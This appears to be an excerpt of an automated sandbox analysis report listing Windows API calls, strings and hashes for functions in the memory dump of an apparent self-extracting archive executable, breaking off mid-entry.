_swprintf.LIBCMT ref: 009F0D4A
_swprintf.LIBCMT ref: 009F0D96

Part of subcall function 009E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009E40A5

AllocConsole.KERNEL32 ref: 009F0D9E
GetCurrentProcessId.KERNEL32 ref: 009F0DA8
AttachConsole.KERNEL32(00000000), ref: 009F0DAF
_wcslen.LIBCMT ref: 009F0DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 009F0DD5
WriteConsoleW.KERNEL32(00000000), ref: 009F0DDC
Sleep.KERNEL32(00002710), ref: 009F0DE7
FreeConsole.KERNEL32 ref: 009F0DED
ExitProcess.KERNEL32 ref: 009F0DF5

Strings

SetDefaultDllDirectories, xrefs: 009F08B9
uxtheme.dll, xrefs: 009F0D17
SetDllDirectoryW, xrefs: 009F0888
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 009F0D84
kernel32, xrefs: 009F0873
DXGIDebug.dll, xrefs: 009F08FC, 009F0C5E
dwmapi.dll, xrefs: 009F0927, 009F0D0D

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1207345701-3298887752
Opcode ID: a4e8933a02a5362c5d0de908c2ad10eb8a53b8904e51f313f3df7da58542d10e
Instruction ID: 8c47de20aea2b62cf509d414df6a1e9a1cf84fbe71d3f1e3cd6a2cdbad7a3995
Opcode Fuzzy Hash: a4e8933a02a5362c5d0de908c2ad10eb8a53b8904e51f313f3df7da58542d10e
Instruction Fuzzy Hash: 1DD175B2408384AFDB31DF94D849BDFBAECBBC9704F50491DF28596151C7B48689CB52

Function 009FC73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 009FC744

Part of subcall function 009FB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 009FB3FB

_wcslen.LIBCMT ref: 009FCA0A
_wcslen.LIBCMT ref: 009FCA13
SetWindowTextW.USER32(?,?), ref: 009FCA71
_wcslen.LIBCMT ref: 009FCAB3
_wcsrchr.LIBVCRUNTIME ref: 009FCBFB
GetDlgItem.USER32(?,00000066), ref: 009FCC36
SetWindowTextW.USER32(00000000,?), ref: 009FCC46
SendMessageW.USER32(00000000,00000143,00000000,00A2A472), ref: 009FCC54
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009FCC7F

Strings

%s.%d.tmp, xrefs: 009FC940
ProgramFilesDir, xrefs: 009FCB45
<br>, xrefs: 009FC9D4
Software\Microsoft\Windows\CurrentVersion, xrefs: 009FCB1A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 2804936435-312220925
Opcode ID: dacaeb6e09bd49fb1c6b2ae083488c3c140b82174a13f4e6488f912218691c3f
Instruction ID: 177f3e0e927d5e26292aafed7a1b6ce0fb94de30a2202680538d1f89a0b19efe
Opcode Fuzzy Hash: dacaeb6e09bd49fb1c6b2ae083488c3c140b82174a13f4e6488f912218691c3f
Instruction Fuzzy Hash: BEE153B690011DAADF25EBA0DD85EFE73BCAB44350F4085A5F709E7090EB749E858F60

Function 009EDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009EDA70
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 009EDAAC

Part of subcall function 009EC29A: _wcslen.LIBCMT ref: 009EC2A2

Part of subcall function 009F05DA: _wcslen.LIBCMT ref: 009F05E0

Part of subcall function 009F1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,009EBAE9,00000000,?,?,?,00010406), ref: 009F1BA0

_wcslen.LIBCMT ref: 009EDDE9
__fprintf_l.LIBCMT ref: 009EDF1C

Strings

RTL, xrefs: 009EDEDE
, xrefs: 009EDD6C
*messages***, xrefs: 009EDBC1
$%s:, xrefs: 009EDEFF
R, xrefs: 009EDC0C
a, xrefs: 009EDC16
,, xrefs: 009EDF57
*messages***, xrefs: 009EDBFA
@%s:, xrefs: 009EDF06, 009EDF12

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 566448164-801612888
Opcode ID: 0ae92943c6fffe8219cd54f4867aaa433205732cff6cf15e3bf8e00090e9edce
Instruction ID: 0f2a69d7964c9573732f85d2afb352a09850cb17cb4a193b954510745532ed94
Opcode Fuzzy Hash: 0ae92943c6fffe8219cd54f4867aaa433205732cff6cf15e3bf8e00090e9edce
Instruction Fuzzy Hash: 5532F172900298EBDF26EF65C845BEE77A9FF48304F40055AFA059B281E7B1DD85CB50

Function 009FD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009FB579
Part of subcall function 009FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009FB58A
Part of subcall function 009FB568: IsDialogMessageW.USER32(00010406,?), ref: 009FB59E
Part of subcall function 009FB568: TranslateMessage.USER32(?), ref: 009FB5AC
Part of subcall function 009FB568: DispatchMessageW.USER32(?), ref: 009FB5B6

GetDlgItem.USER32(00000068,00A3FCB8), ref: 009FD4E8
ShowWindow.USER32(00000000,00000005,?,?,?,009FAF07,00000001,?,?,009FB7B9,00A1506C,00A3FCB8,00A3FCB8,00001000,00000000,00000000), ref: 009FD510
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 009FD51B
SendMessageW.USER32(00000000,000000C2,00000000,00A135F4), ref: 009FD529
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009FD53F
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 009FD559
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009FD59D
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 009FD5AB
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 009FD5BA
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 009FD5E1
SendMessageW.USER32(00000000,000000C2,00000000,00A143F4), ref: 009FD5F0

Strings

\, xrefs: 009FD549

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 8f5ac1f7fd395fae9bf56e082406293b90610d9eea44fe805f7b8784d31cedc3
Instruction ID: d21f6ae45fdf97ff69832a063e59b670784e6de3e7bb828f25ba51a064cf13fe
Opcode Fuzzy Hash: 8f5ac1f7fd395fae9bf56e082406293b90610d9eea44fe805f7b8784d31cedc3
Instruction Fuzzy Hash: C231027A145346BFE711DF64DC0AFAF7FACEBC2708F000618F65196190DBA68A068776

Function 009FD78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 009FD7AE
ShellExecuteExW.SHELL32(?), ref: 009FD8DE
ShowWindow.USER32(?,00000000), ref: 009FD91D
GetExitCodeProcess.KERNEL32(?,?), ref: 009FD959
CloseHandle.KERNEL32(?), ref: 009FD97F
ShowWindow.USER32(?,00000001), ref: 009FD9E1

Strings

.exe, xrefs: 009FD989
.inf, xrefs: 009FD89A

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 6005f90ae7bb37b8782d1789062d93627ea6faf2125b9d6e88ca4412cad1ecbe
Instruction ID: c0437aeb09e78da7caa6ab5aa2ec411a99c500af68c12208720cba8e8c313a6d
Opcode Fuzzy Hash: 6005f90ae7bb37b8782d1789062d93627ea6faf2125b9d6e88ca4412cad1ecbe
Instruction Fuzzy Hash: 3F51F7754063889ADB31DFA4D8447BBBBEAAF82784F04081EF7C197191D7B18D85CB52

Function 00A0A95B Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A05695,00A05695,?,?,?,00A0ABAC,00000001,00000001,2DE85006), ref: 00A0A9B5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A0ABAC,00000001,00000001,2DE85006,?,?,?), ref: 00A0AA3B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A0AB35
__freea.LIBCMT ref: 00A0AB42

Part of subcall function 00A08E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A0CA2C,00000000,?,00A06CBE,?,00000008,?,00A091E0,?,?,?), ref: 00A08E38

__freea.LIBCMT ref: 00A0AB4B
__freea.LIBCMT ref: 00A0AB70

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 59c33417f7e4a6961077da9e048ea5c617449e50584e4fe22d265c3efc368a5e
Instruction ID: b91005797dcf4be738e46f5440b1252bd3da3a3ef0823a25378e3f00283ca94e
Opcode Fuzzy Hash: 59c33417f7e4a6961077da9e048ea5c617449e50584e4fe22d265c3efc368a5e
Instruction Fuzzy Hash: 6251E37260031AAFDB258F64ED41EBFB7AAEB65750F154629FC04D61C0EB34DC90C692

Function 00A03B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00A03C35,?,?,00A42088,00000000,?,00A03D60,00000004,InitializeCriticalSectionEx,00A16394,InitializeCriticalSectionEx,00000000), ref: 00A03C03

Strings

api-ms-, xrefs: 00A03BC3

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: b2ea43de6b4721a26f60aec1ca5e82bfb3dffe40d6a659689dbcccb06571741a
Instruction ID: a6e1553ca5a53b50b921531647a88ca6dfdd94b550352507a740889eefbb1297
Opcode Fuzzy Hash: b2ea43de6b4721a26f60aec1ca5e82bfb3dffe40d6a659689dbcccb06571741a
Instruction Fuzzy Hash: 7D11E337A45228ABDF228BA8AC41B9D37A89F02774F254110E815EB2D0E770EF0086D0

Function 009E98E0 Relevance: 7.6, APIs: 5, Instructions: 111
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,009E7760,?,00000005,?,00000011), ref: 009E995F
GetLastError.KERNEL32(?,?,009E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009E996C
CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,009E7760,?,00000005,?), ref: 009E99A2
GetLastError.KERNEL32(?,?,009E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009E99AA
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,009E7760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009E99F9

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: e22b15c8fb8e527ea09c68388ef17f34def5b5b7d3734d1b1d32525e48fec80f
Instruction ID: 80ae393404170870fea6f5e36b63eced7d85e902fc42dccd26f4fe4a4e3574ec
Opcode Fuzzy Hash: e22b15c8fb8e527ea09c68388ef17f34def5b5b7d3734d1b1d32525e48fec80f
Instruction Fuzzy Hash: 67312131544785AFE721DF22CC46BEABBD8BB44320F200B19F9A1921D2D3A4AD84CB90

Function 009FB568 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009FB579
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009FB58A
IsDialogMessageW.USER32(00010406,?), ref: 009FB59E
TranslateMessage.USER32(?), ref: 009FB5AC
DispatchMessageW.USER32(?), ref: 009FB5B6

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 055af2fb2ed23af81f59fcdbcd852d49ae093b6bb5b7ce575da1637ffb1fec42
Instruction ID: 083483f7479ce1ac9ac73ec69ecb3396acc5ed1f9d268413f352900fff8721ca
Opcode Fuzzy Hash: 055af2fb2ed23af81f59fcdbcd852d49ae093b6bb5b7ce575da1637ffb1fec42
Instruction Fuzzy Hash: 9FF0D07AA0111AAB8F20EFE6DC4CDEB7FBCEE863917004515B505D2010EB38D606CBB0

Function 009FABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 009FABC2
SHAutoComplete.SHLWAPI(?,00000010), ref: 009FABF9

Part of subcall function 009F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,009EC116,00000000,.exe,?,?,00000800,?,?,?,009F8E3C), ref: 009F1FD1

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 009FABE9

Strings

EDIT, xrefs: 009FABCD, 009FABD8, 009FABE5

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 33bd3d987489713fafcc81208707bd8f16a971ca718ca7b3a455cf23f60bd6e4
Instruction ID: 8f562d8c75fbe3b0357ed43676d66e71bccaf5c3ed1cdad75480e353fe6da94d
Opcode Fuzzy Hash: 33bd3d987489713fafcc81208707bd8f16a971ca718ca7b3a455cf23f60bd6e4
Instruction Fuzzy Hash: F9F08276A0022D76DB3096A49C0AFEB766C9FC6B41F484111BA05A21C0D761DE82C6B6

Function 009FAC16 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 009F0836
Part of subcall function 009F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009EF2D8,Crypt32.dll,00000000,009EF35C,?,?,009EF33E,?,?,?), ref: 009F0858

OleInitialize.OLE32(00000000), ref: 009FAC2F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 009FAC66
SHGetMalloc.SHELL32(00A28438), ref: 009FAC70

Strings

riched20.dll, xrefs: 009FAC1E

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: 1759719314aacdd11ec55f3cb71b14d2547f1a40c85b42fa46f5bd49a0ed374a
Instruction ID: 8be137d8d29841907e9fa9e2ba156092f7eb28b5c269476811370dbb43a03625
Opcode Fuzzy Hash: 1759719314aacdd11ec55f3cb71b14d2547f1a40c85b42fa46f5bd49a0ed374a
Instruction Fuzzy Hash: 57F049B9D00209ABCB10AFA9D849AEFFBFCEFC5700F10415AA401A2241CBB456068BA1

Function 009FDBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 009FDBF4
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 009FDC30

Strings

sfxpar, xrefs: 009FDC2B
sfxcmd, xrefs: 009FDBEF

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: a28e732d5c63ae97159bf3b32d53619a9240ba0b1ee210fd03ac9252d8c6dac8
Instruction ID: cda0db53eaf2a6355b46fc0369ceeaed0570491e70eafd66a3ce877509cb1c67
Opcode Fuzzy Hash: a28e732d5c63ae97159bf3b32d53619a9240ba0b1ee210fd03ac9252d8c6dac8
Instruction Fuzzy Hash: 65F0A7B240522CB6DF212FD58C06BFA375DAF45B81B040511BFC596051E6F08980D7A0

Function 009E9785 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6), ref: 009E9795
ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 009E97AD
GetLastError.KERNEL32 ref: 009E97DF
GetLastError.KERNEL32 ref: 009E97FE

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: aab9a736bfe3439bf7ebd8892b4ff626e0f7b7d4b3c10f819e57d3f67f7c9353
Instruction ID: 8f6044934a564db41816d912acb242eb1d8a61c5e29034de5dd9e431bc7b5cfd
Opcode Fuzzy Hash: aab9a736bfe3439bf7ebd8892b4ff626e0f7b7d4b3c10f819e57d3f67f7c9353
Instruction Fuzzy Hash: B511A135910244EBDF229F67C804AAA3BADFB46364F108929F417C52A0D775DE48DB61

Function 00A0AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009ED710,00000000,00000000,?,00A0ACDB,009ED710,00000000,00000000,00000000,?,00A0AED8,00000006,FlsSetValue), ref: 00A0AD66
GetLastError.KERNEL32(?,00A0ACDB,009ED710,00000000,00000000,00000000,?,00A0AED8,00000006,FlsSetValue,00A17970,FlsSetValue,00000000,00000364,?,00A098B7), ref: 00A0AD72
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A0ACDB,009ED710,00000000,00000000,00000000,?,00A0AED8,00000006,FlsSetValue,00A17970,FlsSetValue,00000000), ref: 00A0AD80

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
